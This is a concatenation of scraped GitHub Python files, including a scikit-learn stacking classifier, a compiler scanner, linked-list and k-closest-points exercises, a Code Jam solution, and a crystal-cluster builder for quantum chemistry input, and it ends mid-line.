\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"Momon-dot/Sisben","sub_path":"Program/Brightness_Control.py","file_name":"Brightness_Control.py","file_ext":"py","file_size_in_byte":9855,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"1404628071","text":"# -*- coding: utf-8 -*-\n\"\"\"\n@author: Anna Klepova (inspired by Faron from Kaggle)\nhttps://github.com/q0o0p/sklearn-extensions\n\"\"\"\n\nimport sys\nimport random\nimport operator\nimport numpy as np\nfrom copy import deepcopy\nfrom sklearn import cross_validation\nfrom scipy.sparse import csr_matrix, hstack\nfrom sklearn.preprocessing import LabelEncoder\n\n\nclass StackingClassifier:\n\n def __init__(self, **parameters):\n\n self.set_fields_by_default()\n self.set_params(**parameters)\n\n\n def set_fields_by_default(self):\n\n self.version = '0.0.2'\n self.random_state = 0\n self.use_only_primary_clfs_results = True\n self.primary_is_proba = False\n self.label_encoder = LabelEncoder()\n self.classes_ = None\n self.mode_ = None # BINARY or MULTI\n self.primary_answers_choosing_method = 'MEANS' # 'MEANS', 'BEST_CLF', 'RANDOM_CLF'\n\n\n def train_subsets(self, clf, X, y):\n\n nfolds = 5\n if self.mode_ == 'BINARY':\n intermediate_answers = np.zeros((X.shape[0],))\n else:\n assert self.mode_ == 'MULTI'\n intermediate_answers = np.zeros((X.shape[0], len(self.classes_)))\n skf = cross_validation.StratifiedKFold(y,\n n_folds = nfolds,\n shuffle = True,\n random_state = self.random_state)\n clfs = []\n for i, (train_index, test_index) in enumerate(skf):\n x_tr = X[train_index]\n y_tr = y[train_index]\n x_te = X[test_index]\n clf_copy = deepcopy(clf)\n clf_copy.fit(x_tr, y_tr)\n clfs.append(clf_copy)\n if self.primary_is_proba:\n if 'predict_proba' in dir(clf_copy):\n probas = clf_copy.predict_proba(x_te)\n if self.mode_ == 'BINARY':\n intermediate_answers[test_index] = map(operator.itemgetter(1),\n probas)\n else:\n assert self.mode_ == 'MULTI'\n intermediate_answers[test_index] = probas\n elif 'decision_function' in dir(clf_copy):\n scores = clf_copy.decision_function(x_te)\n if self.mode_ == 'BINARY':\n assert type(scores[0]) is np.float64\n else:\n assert self.mode_ == 'MULTI'\n assert type(scores[0]) is np.ndarray\n intermediate_answers[test_index] = scores\n else:\n print >> sys.stderr, 'Error in StackingClassifier: parameter \"primary_is_proba\" is True, however one of primary classifiers has neither \"predict_proba\" method nor \"decision_function\". This classifier is \"{}\"\\n'.format(type(clf_copy))\n exit(1)\n else:\n intermediate_answers[test_index] = clf_copy.predict(x_te)\n\n if self.mode_ == 'BINARY':\n return intermediate_answers.reshape(-1, 1), tuple(clfs)\n else:\n assert self.mode_ == 'MULTI'\n return intermediate_answers, tuple(clfs)\n\n\n def fit(self, X, y):\n\n y_encoded = self.label_encoder.fit_transform(y)\n self.classes_ = self.label_encoder.classes_\n if len(self.classes_) < 2:\n print >> sys.stderr, 'Error in StackingClassifier: There are {} classes. 
There should be at least 2 classes\\n'\n exit(1)\n elif len(self.classes_) == 2:\n self.mode_ = 'BINARY'\n else:\n self.mode_ = 'MULTI'\n intermediate_answers = dict()\n for i in range(len(self.primary_clfs)):\n if self.primary_clfs[i]['name'] in intermediate_answers:\n print >> sys.stderr, 'Error in StackingClassifier: names of primary classifiers are not unique\\n'\n exit(1)\n (intermediate_answers[self.primary_clfs[i]['name']],\n self.primary_clfs[i]['clfs']) = self.train_subsets(self.primary_clfs[i]['clf'],\n X,\n y_encoded)\n #print \"type(intermediate_answers[self.primary_clfs[i]['name']])\", type(intermediate_answers[self.primary_clfs[i]['name']])\n #print \"intermediate_answers[self.primary_clfs[i]['name']].shape\", intermediate_answers[self.primary_clfs[i]['name']].shape\n if self.mode_ == 'BINARY':\n features = [csr_matrix(intermediate_answers[self.primary_clfs[i]['name']]) for i in range(len(self.primary_clfs))]\n else:\n assert self.mode_ == 'MULTI'\n # [clf1_cls1, clf1_cls2, clf1_cls3, clf2_cls1, clf2_cls2, clf2_cls3,]\n features = [csr_matrix(intermediate_answers[self.primary_clfs[i]['name']][:, class_idx].reshape(-1, 1)) for i in range(len(self.primary_clfs)) for class_idx in range(len(self.classes_))]\n if not self.use_only_primary_clfs_results:\n features = [X] + features\n #print 'len(features)', len(features)\n #print 'features[0].shape in fit', features[0].shape\n X_intermediate = hstack(features)\n #print 'X_intermediate.shape in fit', X_intermediate.shape\n self.clf.fit(X_intermediate, y_encoded)\n #print 'fitted'\n return self\n\n\n def build_matrix_for_prediction(self, X):\n\n nfolds = 5\n intermediate_answers = dict()\n for primary_clf in self.primary_clfs:\n if self.mode_ == 'BINARY':\n intermediate_answers[primary_clf['name']] = np.zeros((X.shape[0],))\n else:\n intermediate_answers[primary_clf['name']] = np.zeros((len(self.classes_), X.shape[0]))\n if self.mode_ == 'BINARY':\n intermediate_answers_skf = np.empty((nfolds, X.shape[0]))\n else:\n assert self.mode_ == 'MULTI'\n intermediate_answers_skf = [np.empty((nfolds, X.shape[0])) for class_idx in range(len(self.classes_))]\n for i in range(nfolds):\n if self.primary_is_proba:\n if 'predict_proba' in dir(primary_clf['clfs'][i]):\n probas = primary_clf['clfs'][i].predict_proba(X)\n if self.mode_ == 'BINARY':\n intermediate_answers_skf[i, :] = map(operator.itemgetter(1), probas)\n else:\n assert self.mode_ == 'MULTI'\n for class_idx in range(len(self.classes_)):\n intermediate_answers_skf[class_idx][i, :] = map(operator.itemgetter(class_idx), probas)\n elif 'decision_function' in dir(primary_clf['clfs'][i]):\n scores = primary_clf['clfs'][i].decision_function(X)\n if self.mode_ == 'BINARY':\n assert type(scores[0]) is np.float64\n intermediate_answers_skf[i, :] = scores\n else:\n assert self.mode_ == 'MULTI'\n assert type(scores[0]) is np.ndarray\n for class_idx in range(len(self.classes_)):\n intermediate_answers_skf[class_idx][i, :] = map(operator.itemgetter(class_idx), scores)\n else:\n print >> sys.stderr, 'Error in StackingClassifier: parameter \"primary_is_proba\" is True, however one of primary classifiers has neither \"predict_proba\" method nor \"decision_function\". 
This classifier is \"{}\"\\n'.format(type(primary_clf['clfs'][i]))\n exit(1)\n else:\n intermediate_answers_skf[i, :] = primary_clf['clfs'][i].predict(X)\n\n if self.mode_ == 'BINARY':\n intermediate_answers[primary_clf['name']][:] = intermediate_answers_skf.mean(axis=0)\n else:\n assert self.mode_ == 'MULTI'\n if self.primary_answers_choosing_method == 'MEANS':\n for class_idx in range(len(self.classes_)):\n #print 'intermediate_answers_skf[class_idx].shape', intermediate_answers_skf[class_idx].shape\n intermediate_answers[primary_clf['name']][class_idx][:] = intermediate_answers_skf[class_idx].mean(axis = 0)\n elif self.primary_answers_choosing_method == 'BEST_CLF':\n for object_idx in range(X.shape[0]):\n sorted_values = []\n for class_idx in range(len(self.classes_)):\n values = []\n for fold_idx in range(nfolds):\n values.append(intermediate_answers_skf[class_idx][fold_idx][object_idx])\n sorted_values.append(sorted(values))\n tuple_scores = []\n max_score = None\n max_score_tuple = None\n for fold_idx in range(nfolds):\n score = 0\n for class_idx in range(len(self.classes_)):\n curr_sorted_values = sorted_values[class_idx]\n val = intermediate_answers_skf[class_idx][fold_idx][object_idx]\n for i in range((nfolds + 1) / 2):\n if val == curr_sorted_values[i] or \\\n val == curr_sorted_values[nfolds - 1 - i]:\n score += 10 ** i\n tuple_scores.append(score)\n if max_score is None or score > max_score:\n max_score = score\n max_score_tuple = [intermediate_answers_skf[class_idx][fold_idx][object_idx] for class_idx in range(len(self.classes_))]\n for class_idx in range(len(self.classes_)):\n intermediate_answers[primary_clf['name']][class_idx][object_idx] = max_score_tuple[class_idx]\n else:\n assert self.primary_answers_choosing_method == 'RANDOM_CLF'\n for object_idx in range(X.shape[0]):\n random_fold = random.randint(1, 5) - 1\n max_score_tuple = [intermediate_answers_skf[class_idx][random_fold][object_idx] for class_idx in range(len(self.classes_))]\n for class_idx in range(len(self.classes_)):\n intermediate_answers[primary_clf['name']][class_idx][object_idx] = max_score_tuple[class_idx]\n #print \"intermediate_answers[primary_clf['name']].shape in build_matrix_for_prediction\", intermediate_answers[primary_clf['name']].shape\n if self.mode_ == 'BINARY' or not self.primary_is_proba:\n features = [csr_matrix(intermediate_answers[primary_clf['name']].reshape(-1, 1)) for primary_clf in self.primary_clfs]\n else:\n assert self.mode_ == 'MULTI'\n features = [csr_matrix(intermediate_answers[primary_clf['name']][class_idx].reshape(-1, 1)) for primary_clf in self.primary_clfs for class_idx in range(len(self.classes_))]\n #print 'len(features) in build_matrix_for_prediction', len(features)\n #print 'features[0].shape in build_matrix_for_prediction', features[0].shape\n if not self.use_only_primary_clfs_results:\n features = [X] + features\n X_intermediate = hstack(features)\n return X_intermediate\n \n \n def predict(self, X):\n \n X_intermediate = self.build_matrix_for_prediction(X)\n predicted = self.clf.predict(X_intermediate)\n return self.label_encoder.inverse_transform(predicted)\n\n\n def predict_proba(self, X):\n \n X_intermediate = self.build_matrix_for_prediction(X)\n predicted = self.clf.predict_proba(X_intermediate)\n return predicted\n\n\n def get_params(self, deep = True):\n \n params = {'primary_clfs': self.primary_clfs,\n 'clf': self.clf,\n 'use_only_primary_clfs_results': self.use_only_primary_clfs_results,\n 'primary_is_proba': self.primary_is_proba,\n 'label_encoder': 
self.label_encoder,\n 'classes_': self.classes_,\n 'mode_': self.mode_,\n 'version': self.version,\n 'primary_answers_choosing_method': self.primary_answers_choosing_method}\n for i in range(len(self.primary_clfs)):\n primary_clf_params = self.primary_clfs[i]['clf'].get_params()\n for k in primary_clf_params:\n params['primary__{}__{}'.format(self.primary_clfs[i]['name'], k)] = primary_clf_params[k]\n clf_params = self.clf.get_params()\n for k in clf_params:\n params['clf__{}'.format(k)] = clf_params[k]\n return params\n \n \n def set_params(self, **parameters):\n \n for param, value in parameters.items():\n if param == 'primary_clfs':\n if value is not None:\n assert type(value) is list\n self.primary_clfs = value\n if param == 'clf':\n if value is not None:\n self.clf = value\n if param == 'random_state':\n if value is not None:\n self.random_state = value\n if param == 'use_only_primary_clfs_results':\n if value is not None:\n self.use_only_primary_clfs_results = value\n if param == 'primary_is_proba':\n if value is not None:\n self.primary_is_proba = value\n if param == 'label_encoder':\n if value is not None:\n self.label_encoder = value\n if param == 'classes_':\n if value is not None:\n self.classes_ = value\n if param == 'mode_':\n if value is not None:\n self.mode_ = value\n if param == 'version':\n if value is not None:\n self.version = value\n if param == 'primary_answers_choosing_method':\n if value is not None:\n self.primary_answers_choosing_method = value\n primary_clf_indices = dict()\n for i in range(len(self.primary_clfs)):\n primary_clf_indices[self.primary_clfs[i]['name']] = i\n primary_clf_new_params = dict()\n clf_new_params = dict()\n for param, value in parameters.items():\n splitted = param.split('__')\n if len(splitted) > 2:\n if splitted[0] == 'primary' and splitted[1] in primary_clf_indices:\n if splitted[1] not in primary_clf_new_params:\n primary_clf_new_params[splitted[1]] = dict()\n primary_clf_new_params[splitted[1]]['__'.join(splitted[2:])] = value\n elif splitted[0] == 'clf':\n clf_new_params['__'.join(splitted[1:])] = value\n else:\n raise 'Error in StackingClassifier.set_params: wrong parameter name: {}\\n'.format(param)\n for clf_name in primary_clf_new_params:\n self.primary_clfs[primary_clf_indices[clf_name]]['clf'].set_params(**(primary_clf_new_params[clf_name]))\n self.clf.set_params(**clf_new_params)\n return self\n\n\n","repo_name":"q0o0p/sklearn-extensions","sub_path":"stacking_classifier.py","file_name":"stacking_classifier.py","file_ext":"py","file_size_in_byte":15697,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"74920338434","text":"from scanner.file_reader import FileReader\nfrom scanner.regex import Regex\nfrom scanner.state import FinalState, State, ErrorState\nfrom scanner.file_writer import FileWriter\nfrom scanner.interval import Interval, OtherTypeInterval\n\n\nclass Scanenr:\n def __init__(self, address, symbol):\n self.fr = FileReader(path=address)\n self.fw = FileWriter(symbol)\n self.regex_ = Regex()\n # self.current_state = self.regex_.state_zero\n\n def get_token(self):\n current_state = self.regex_.state_zero\n while not self.fr.is_last_line:\n if self.fr.current_char == len(self.fr.backup_line) - 1:\n self.fr.load_backup_line()\n if not self.fr.is_last_line:\n x = self.fr.forward_read()\n else:\n x = \"♤\"\n\n if current_state.stateID == \"0\" and x == \"♤\":\n break\n current_state = current_state.get_next_state(x)\n if isinstance(current_state, FinalState):\n if current_state.is_backward() and x != \"♤\":\n self.fr.backward_read()\n token = self.fr.return_token() # it must'nt delete\n if current_state.stateID != 'f' and current_state.stateID != 'c':\n state_id = current_state.__str__()\n if x == \"♤\":\n token = current_state.str1\n if state_id == \"KEYWORD\":\n self.fw.add_symbol_to_symbol_table(token)\n if not State.is_keyword(token):\n state_id = \"ID\"\n self.fw.tokens_writer(self.fr.current_line, state_id, token)\n return self.fr.current_line, state_id, token\n\n current_state = self.regex_.state_zero\n if isinstance(current_state, ErrorState):\n if current_state.is_backward():\n self.fr.backward_read()\n ErrorState.noError = False\n errorType = current_state.typeError()\n errorToken = self.fr.return_token() #\n line_number = self.fr.current_line\n if current_state.stateID == \"e2\":\n str_tmp = \"\"\n i = -2\n for char in current_state.str1:\n if i == 5:\n str_tmp += \"...\"\n i += 1\n if char == \"\\n\":\n if i < 6:\n str_tmp += \"\\\\n\"\n line_number -= 1\n elif i < 6:\n str_tmp += char\n self.fw.lexical_errors(line_number, errorType, str_tmp)\n else:\n self.fw.lexical_errors(line_number, errorType, errorToken)\n current_state = self.regex_.state_zero\n\n self.fw.tokens_writer(self.fr.current_line+1, \"\", \"♤\")\n # write_symbol_table()\n self.fw.lexical_error_write()\n return self.fr.current_line, \"\", \"♤\"\n","repo_name":"alimohammadiamirhossein/cminus","sub_path":"scanner/scanner.py","file_name":"scanner.py","file_ext":"py","file_size_in_byte":3104,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"27146015608","text":"\r\nclass Node:\r\n\tdef __init__(self, data):\r\n\t\tself.data = data\r\n\t\tself.next = None\r\n\r\ndef getNode(data):\r\n\t# allocating node\r\n\tnew_node = Node(0)\r\n\tnew_node.data = data\r\n\tnew_node.next = new_node.prev = None\r\n\treturn new_node\r\n\r\ndef push(head, new_node):\r\n\tnew_node.prev = None\r\n\tnew_node.next = head\r\n\tif ((head) != None):\r\n\t\thead.prev = new_node\r\n\thead = new_node\r\n\treturn head\r\n\r\ndef printList(head):\r\n\twhile (head):\r\n\t\tprint(head.data, end=\" \")\r\n\t\thead = head.next\r\n\r\ndef revListInGroupOfGivenSize(head, k):\r\n\tif head is None:\r\n\t\treturn head\r\n\tst = head\r\n\tglobprev, ans = None, None\r\n\twhile (st != None):\r\n\t\tcount = 1\r\n\t\tcurr = st\r\n\t\tprev, next_node = None, None\r\n\t\twhile (curr != None and count <= k):\r\n\t\t\tnext_node = curr.next\r\n\t\t\tcurr.prev = next_node\r\n\t\t\tcurr.next = prev\r\n\t\t\tprev = curr\r\n\t\t\tcurr = next_node\r\n\t\t\tcount += 1\r\n\t\tif ans is None:\r\n\t\t\tans = prev\r\n\t\t\tans.prev = None\r\n\t\tif globprev is None:\r\n\t\t\tglobprev = st\r\n\t\telse:\r\n\t\t\tglobprev.next = prev\r\n\t\t\tprev.prev = globprev\r\n\t\t\tglobprev = st\r\n\t\tst = curr\r\n\treturn ans\r\n\r\nhead = None\r\nhead = push(head, getNode(2))\r\nhead = push(head, getNode(4))\r\nhead = push(head, getNode(8))\r\nhead = push(head, getNode(10))\r\nprint(\"Original list:\", end=\" \")\r\nprintList(head)\r\nk = 2\r\nhead = revListInGroupOfGivenSize(head, k)\r\nprint(\"\\nModified list:\", end=\" \")\r\nprintList(head)\r\n\r\n","repo_name":"shrutii2/Linked-List-in-Python","sub_path":"rotatedllingrpofgivensize.py","file_name":"rotatedllingrpofgivensize.py","file_ext":"py","file_size_in_byte":1327,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"72324686273","text":"import heapq\nfrom typing import List\n# 10.03 first try,自己的解,能跑过test \n# # case但是submit超时,因为太多重复iteration了,属实没有必要\nclass Solution:\n def kClosest(self, points: list[list[int]], k: int) -> list[list[int]]:\n distance = {}\n for i in range(len(points)):\n point = points[i]\n if len(distance) < k:\n distance[i] = point[0]**2 + point[1]**2\n else:\n cur_max_distance = max(distance.values())\n if point[0]**2 + point[1]**2 < cur_max_distance:\n del distance[max(distance, key = distance.get)]\n distance[i] = point[0]**2 + point[1]**2\n else:\n pass\n res_keys = distance.keys()\n res = [points[i] for i in res_keys]\n return res\n\n\n# 其实全部算一遍然后sort就好了,for loop O(n), sort O(nlog(n))\nclass Solution:\n def kClosest(self, points: list[list[int]], k: int) -> list[list[int]]:\n res = []\n for x, y in points:\n dist = x ** 2 + y ** 2\n res.append([dist, x, y])\n res.sort(key = lambda e: e[0])\n res = [[x, y] for d, x, y in res[0:k]]\n return res\n\n\n# neetcode 用的heap应该会比sort稍微efficient一点点\nclass Solution:\n def kClosest(self, points: list[list[int]], k: int) -> list[list[int]]:\n pts = []\n for x, y in points:\n dist = (abs(x - 0) ** 2) + (abs(y - 0) ** 2)\n pts.append([dist, x, y])\n\n res = []\n heapq.heapify(pts)\n for _ in range(k):\n dist, x, y = heapq.heappop(pts)\n res.append([x, y])\n return res\n\n# 11.10 复习自己写,min heap是O(nlogn),因为heap长度等于 points length,但是如果用长度为k的max heap,T会被缩减为 O(nlogk). 在k比n小很多的情况下会更优\nclass Solution:\n def kClosest(self, points: List[List[int]], k: int) -> List[List[int]]:\n heap = []\n res = []\n\n for point in points:\n x, y = point[0], point[1]\n heapq.heappush(heap, (x**2 + y**2, point)) #像neet code那样全部保存起来然后heapify更好,因为heapify一次只要O(n)但是push n次需要n * logn(每次push的花费)\n \n while k:\n res.append(heapq.heappop(heap)[1])\n k -= 1\n \n return res\n\n# 用max heap重写了一遍\nclass Solution:\n def kClosest(self, points: List[List[int]], k: int) -> List[List[int]]:\n heap = [] # max heap with max len = k\n\n for x, y in points:\n dist = x ** 2 + y ** 2\n if len(heap) == k:\n if -1 * heap[0][0] > dist:\n heapq.heappop(heap)\n else:\n continue\n heapq.heappush(heap, (-dist, [x, y]))\n \n return [point[1] for point in heap]\n\n# 去做215之后用quick select重写了一遍。这个答案能pass 86 out of 87 cases,在最后k = 5k的时候TLE了。但是知道有这个解法还是很重要的\n# - Best Case: O(n)\n# - Average Case: O(n)\n# - Worst Case: O(n^2)\nclass Solution:\n def kClosest(self, points: List[List[int]], k: int) -> List[List[int]]:\n \n def partition(ls, left, right):\n fill, pivot = left, ls[right]\n for i in range(left, right):\n ls_distance = ls[i][0] ** 2 + ls[i][1] ** 2\n pivot_distance = pivot[0] ** 2 + pivot[1] ** 2\n if ls_distance <= pivot_distance:\n ls[i], ls[fill] = ls[fill], ls[i]\n fill += 1\n ls[fill], ls[right] = ls[right], ls[fill]\n return fill\n \n l, r = 0, len(points) - 1\n while l < r:\n fill = partition(points, l, r)\n if fill > k:\n r = fill - 1\n elif fill < k:\n l = fill + 1\n else:\n break\n \n return [[x, y] for x, y in points[:k]]\n\n\n# 1.9 复习,不明白为啥这题是medium,好像很简单?\nclass Solution:\n def kClosest(self, points: List[List[int]], k: int) -> List[List[int]]:\n hp = []\n res = []\n\n for x, y in points:\n d = x ** 2 + y ** 2\n hp.append([d, x, y])\n heapq.heapify(hp)\n while k > 0:\n _, x, y = heapq.heappop(hp)\n res.append([x, y])\n k -= 1\n return res\n \n 
","repo_name":"deezeey/LC","sub_path":"src/solutions/973_kClosestPointsToOrigin.py","file_name":"973_kClosestPointsToOrigin.py","file_ext":"py","file_size_in_byte":4486,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"23496037991","text":"import os\n\nfile_path_input = os.getcwd() + '/' + 'prob2.in'\nfile_path_output = os.getcwd() + '/' + 'prob2.out'\n\nwith open(file_path_output, 'wb') as output_data:\n\twith open(file_path_input, 'rb') as input_data:\n\t\t\tnum_cases = int(input_data.readline())\n\n\t\t\tfor i in range(num_cases):\n\t\t\t\tcurr_stack = list(input_data.readline().decode())\n\t\t\t\ttry:\n\t\t\t\t\tcurr_stack.remove('\\n')\n\t\t\t\texcept: \n\t\t\t\t\tnothing = 1\n\n\t\t\t\tif len(curr_stack) == 1:\n\t\t\t\t\tif curr_stack[0] == '-':\n\t\t\t\t\t\tout_line = 'Case #' + str(i+1) + ': 1\\n' \n\t\t\t\t\t\toutput_data.write(out_line.encode())\n\t\t\t\t\telse:\n\t\t\t\t\t\tout_line = 'Case #' + str(i+1) + ': 0\\n'\n\t\t\t\t\t\toutput_data.write(out_line.encode())\n\n\t\t\t\telse:\n\t\t\t\t\titer1 = 0\n\t\t\t\t\titer2 = 1\n\t\t\t\t\tcount = 0\n\t\t\t\t\twhile '-' in curr_stack:\n\t\t\t\t\t\tif '+' not in curr_stack:\n\t\t\t\t\t\t\tcount += 1\n\t\t\t\t\t\t\tbreak\n\n\t\t\t\t\t\twhile curr_stack[iter1] == curr_stack[iter2]:\n\t\t\t\t\t\t\tif iter2 <= len(curr_stack)-2:\n\t\t\t\t\t\t\t\titer1 += 1\n\t\t\t\t\t\t\t\titer2 += 1\n\n\t\t\t\t\t\tif curr_stack[iter1] == '-':\n\t\t\t\t\t\t\tfor j in range(iter2):\n\t\t\t\t\t\t\t\tcurr_stack[j] = '+'\n\t\t\t\t\t\t\tcount += 1\n\t\t\t\t\t\t\tprev = '+'\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tfor j in range(iter2):\n\t\t\t\t\t\t\t\tcurr_stack[j] = '-'\n\t\t\t\t\t\t\tcount += 1\n\t\t\t\t\t\t\tprev = '-'\n\n\t\t\t\t\tout_line = 'Case #' + str(i+1) + ': ' + str(count) + '\\n'\n\t\t\t\t\toutput_data.write(out_line.encode())\n\n\tinput_data.close()\noutput_data.close()","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_178/2759.py","file_name":"2759.py","file_ext":"py","file_size_in_byte":1318,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"34025714816","text":"#!/usr/bin/env python3.5\r\n# -*- coding: utf-8 -*-\r\n\r\n__author__ = 'Weiguo Jing'\r\n__version__ = \"2.0.0\"\r\n\r\n\r\nfrom method.read import poscar\r\nfrom method.structure import Structure\r\nfrom method.atom import Atom\r\nimport numpy as np\r\n\r\n\r\ndef structure_species(structure):\r\n from method.defect import specieset\r\n atoms_type = specieset(structure)\r\n species = {}\r\n for name in atoms_type:\r\n count = 0\r\n for atom in structure:\r\n if atom.type == name:\r\n count += 1\r\n species[name] = count\r\n return sorted(species.items(), key=lambda item: item[1])\r\n\r\n\r\ndef distance_of_center_and_surface(center, cell):\r\n norm_v_ab = np.cross(cell[0], cell[1])/np.linalg.norm(np.cross(cell[0], cell[1]))\r\n norm_v_bc = np.cross(cell[1], cell[2])/np.linalg.norm(np.cross(cell[1], cell[2]))\r\n norm_v_ca = np.cross(cell[2], cell[0])/np.linalg.norm(np.cross(cell[2], cell[0]))\r\n distance_ab = abs(np.dot(center, norm_v_ab))\r\n distance_bc = abs(np.dot(center, norm_v_bc))\r\n distance_ca = abs(np.dot(center, norm_v_ca))\r\n return distance_ab, distance_bc, distance_ca\r\n\r\n\r\ndef build_cluster(structure, cluster_r, doped_atom_type=None, center=None, core_r=None, tolerance=0.2):\r\n from method.coordination_shells import coordination_shells\r\n\r\n position = np.array([0.0, 0.0, 0.0])\r\n species = structure_species(structure)\r\n if doped_atom_type is None:\r\n doped_atom_type = species[0][0]\r\n print('\\nTry to use *{0}* atoms as doped atoms\\n'.format(doped_atom_type))\r\n if center is None:\r\n num = 0\r\n for atom in structure:\r\n if atom.type == doped_atom_type:\r\n position += atom.pos\r\n num += 1\r\n center = position/num\r\n if cluster_r > min(distance_of_center_and_surface(center, structure.cell.T)):\r\n print('\\nERROR: the cluster is out range of the CONTCAR supercell structure. 
'\r\n 'Please use a bigger supercell or a smaller cluster_r parameter\\n')\r\n exit(1)\r\n\r\n cluster = Structure(structure.cell, scale=structure.scale)\r\n if core_r is None:\r\n print('\\nTry to use the nearest neighbor of doped atoms to build core structure.\\n')\r\n nearest_neighbors = []\r\n for atom in structure:\r\n if atom.type == doped_atom_type:\r\n neighbors = coordination_shells(structure, nshells=5, center=atom.pos, tolerance=tolerance)\r\n nearest_neighbors.append(atom)\r\n atom.pseudo = 0\r\n for item in neighbors[0]:\r\n atom = item[0]\r\n nearest_neighbors.append(atom)\r\n atom.pseudo = 0\r\n atom = neighbors[0][0][0]\r\n nearest_name = atom.type\r\n print('\\nSet *{0}* atoms as nearest neighbor.\\n'.format(nearest_name))\r\n flag = 0\r\n for i in range(1, 5):\r\n temp = []\r\n for item in neighbors[i]:\r\n if flag != 0:\r\n break\r\n atom = item[0]\r\n if nearest_name == atom.type:\r\n if not hasattr(atom, 'pseudo'):\r\n temp.append(atom)\r\n atom.pseudo = 0\r\n else:\r\n flag = 1\r\n nearest_neighbors.extend(temp)\r\n # nearest neighbor might be outside of CONTCAR\r\n with open('core structure.txt', 'w+') as fp:\r\n for atom in nearest_neighbors:\r\n fp.writelines(atom.type+' '+str(atom.pos)+'\\n')\r\n for atom in structure:\r\n position = atom.pos\r\n d = np.linalg.norm(center - position)\r\n if d <= cluster_r:\r\n if hasattr(atom, 'pseudo'):\r\n cluster.append(Atom(atom.pos - center, atom.type, pseudo=0))\r\n else:\r\n cluster.append(Atom(atom.pos - center, atom.type, pseudo=-1))\r\n else:\r\n for atom in structure:\r\n d = np.linalg.norm(center - atom.pos)\r\n if d <= core_r:\r\n cluster.append(Atom(atom.pos - center, atom.type, pseudo=0))\r\n elif d <= cluster_r:\r\n cluster.append(Atom(atom.pos - center, atom.type, pseudo=-1))\r\n return cluster, center\r\n\r\n\r\ndef cluster_from_substrate(host, center, cluster_r):\r\n temp = []\r\n for atom in host:\r\n position = atom.pos\r\n d = np.linalg.norm(center - position)\r\n if d <= cluster_r:\r\n temp.append(atom)\r\n return temp\r\n\r\n\r\ndef remove_doped_atoms(structure, remove_dict):\r\n temp = []\r\n for atom in structure:\r\n if atom.type in remove_dict.keys():\r\n value = remove_dict[atom.type]\r\n if value != '':\r\n temp.append(Atom(atom.pos, value))\r\n else:\r\n temp.append(Atom(atom.pos, atom.type))\r\n new_structure = Structure(structure.cell, scale=structure.scale)\r\n new_structure.extend(temp)\r\n return new_structure\r\n\r\n\r\ndef extend_structure(structure, shell_r):\r\n cell = structure.cell.T\r\n volume = structure.volume\r\n hz = volume/np.linalg.norm(np.cross(cell[0], cell[1]))\r\n hx = volume/np.linalg.norm(np.cross(cell[1], cell[2]))\r\n hy = volume/np.linalg.norm(np.cross(cell[2], cell[0]))\r\n if min(hx, hy, hz)/2 >= shell_r:\r\n return structure\r\n nz = int(np.ceil(shell_r/hz - 0.5))\r\n nx = int(np.ceil(shell_r/hx - 0.5))\r\n ny = int(np.ceil(shell_r/hy - 0.5))\r\n temp = []\r\n for i in range(-nx, nx+1):\r\n for j in range(-ny, ny+1):\r\n for k in range(-nz, nz+1):\r\n for atom in structure:\r\n position = atom.pos + i*cell[0] + j*cell[1] + k*cell[2]\r\n temp.append(Atom(position, atom.type))\r\n supercell = Structure(structure.cell, scale=structure.scale)\r\n supercell.extend(temp)\r\n return supercell\r\n\r\n\r\ndef build_shell(structure, center, cluster_r, shell_r, pure_substrate=False, remove_dict=None):\r\n\r\n if pure_substrate is False:\r\n if remove_dict is None:\r\n print('ERROR: remove_list can not be None when substrate includes doped atoms.\\n')\r\n exit(1)\r\n structure = 
remove_doped_atoms(structure, remove_dict)\r\n supercell = extend_structure(structure, shell_r)\r\n shell = Structure(structure.cell, scale=structure.scale)\r\n temp = []\r\n for atom in supercell:\r\n position = atom.pos\r\n d = np.linalg.norm(position - center)\r\n if cluster_r < d <= shell_r:\r\n temp.append(Atom(position - center, atom.type))\r\n shell.extend(temp)\r\n return shell\r\n\r\n\r\ndef build_mosaic_structure(cluster, shell):\r\n for atom in shell:\r\n cluster.append(Atom(atom.pos, atom.type, pseudo=-1))\r\n return cluster\r\n\r\n\r\ndef write_seward_input(structure, core_pseudo, mosaic_pseudo, charge, mosaic_r, file_name='1_sew.in', title=None):\r\n core = {}\r\n mosaic = {}\r\n count = 0\r\n for key in core_pseudo:\r\n core[key] = []\r\n for key in mosaic_pseudo:\r\n mosaic[key] = []\r\n ion = []\r\n for atom in structure:\r\n if atom.pseudo == 0:\r\n try:\r\n core[atom.type].append(atom)\r\n except KeyError:\r\n print('ERROR: Core pseudo potential do not include the information about {0}\\n'.format(atom.type))\r\n exit(1)\r\n finally:\r\n count += 1\r\n elif np.linalg.norm(atom.pos) <= mosaic_r:\r\n try:\r\n mosaic[atom.type].append(atom)\r\n except KeyError:\r\n print('ERROR: mosaic pseudo potential do not include the information about {0}\\n'.format(atom.type))\r\n exit(1)\r\n finally:\r\n count += 1\r\n else:\r\n ion.append(atom)\r\n string = \" &SEWARD &END\\nTitle\\n{0}\\n\".format(title)\r\n for key in core.keys():\r\n temp = \"Basis set\\n{0}\\n\".format(core_pseudo[key])\r\n i = 1\r\n for atom in core[key]:\r\n temp = temp + \"{name}{num}{pos0}{pos1}{pos2} Angstrom \\n\".format(name=atom.type, num='{:<6d}'.format(i),\r\n pos0='{:10.4f}'.format(atom.pos[0]),\r\n pos1='{:10.4f}'.format(atom.pos[1]),\r\n pos2='{:10.4f}'.format(atom.pos[2]))\r\n i += 1\r\n temp = temp + \"End of basis\\n********************************************\\n\"\r\n string = string + temp\r\n abc_code = 65\r\n for key in mosaic.keys():\r\n temp = \"Basis set\\n{0}\\n\".format(mosaic_pseudo[key])\r\n i = 1\r\n for atom in 